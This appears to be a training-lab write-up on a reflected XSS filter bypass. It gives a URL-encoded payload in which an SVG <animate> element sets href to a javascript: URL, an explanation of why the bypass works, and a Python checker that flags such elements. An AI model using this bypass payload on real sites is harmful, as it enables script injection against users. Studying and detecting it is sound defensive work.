Reflected XSS with event handlers and href attributes blocked
Description
The website in this lab contains a reflected XSS vulnerability. Some tags are whitelisted, but all event handlers and anchor href attributes are blocked.
Reproduction and proof of concept
Visit the following URL, replacing 0aea002d04f460bbc1d2491e00ad00da with your lab ID:
https://0aea002d04f460bbc1d2491e00ad00da.web-security-academy.net/?search=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E
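
The decoded search value in the URL above puts no href attribute on the <a> element; an SVG <animate> element names href in attributeName and carries the javascript: URL in values, which is why a filter that only strips href attributes lets it through. The following is an added example, not part of the lab material: a Python check that parses a reflected parameter and reports animation elements that target a link attribute. The class and function names, and the inclusion of <set> and xlink:href, are assumptions of this sketch.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# The URL from this page, used as sample input.
SAMPLE_URL = (
    "https://0aea002d04f460bbc1d2491e00ad00da.web-security-academy.net/?search="
    "%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)"
    "+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E"
)

# SVG animation elements that can write an attribute on their parent element
# (assumption: <set> is covered as well as the <animate> seen on the page).
ANIMATION_TAGS = {"animate", "set"}
# Attributes that carry a URL on <a>; "xlink:href" is the legacy SVG spelling.
LINK_ATTRS = {"href", "xlink:href"}


class IndirectHrefFinder(HTMLParser):
    """Collects animation elements whose attributeName targets a link attribute."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so attributeName
        # arrives as "attributename"; a valueless attribute has value None.
        attr = {name: (value or "") for name, value in attrs}
        target = attr.get("attributename", "").strip().lower()
        if tag in ANIMATION_TAGS and target in LINK_ATTRS:
            supplied = " ".join(attr.get(k, "") for k in ("values", "to", "from", "by"))
            self.findings.append((tag, target, supplied.strip()))


def audit_parameter(url, param="search"):
    """Return (tag, target attribute, supplied value) for each indirect href write."""
    finder = IndirectHrefFinder()
    for value in parse_qs(urlsplit(url).query).get(param, []):
        finder.feed(value)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for finding in audit_parameter(SAMPLE_URL):
        print(finding)
```

A non-empty result means the filter has to treat attributeName (and the value it supplies) as a link attribute too, or drop SVG animation elements from the tag whitelist.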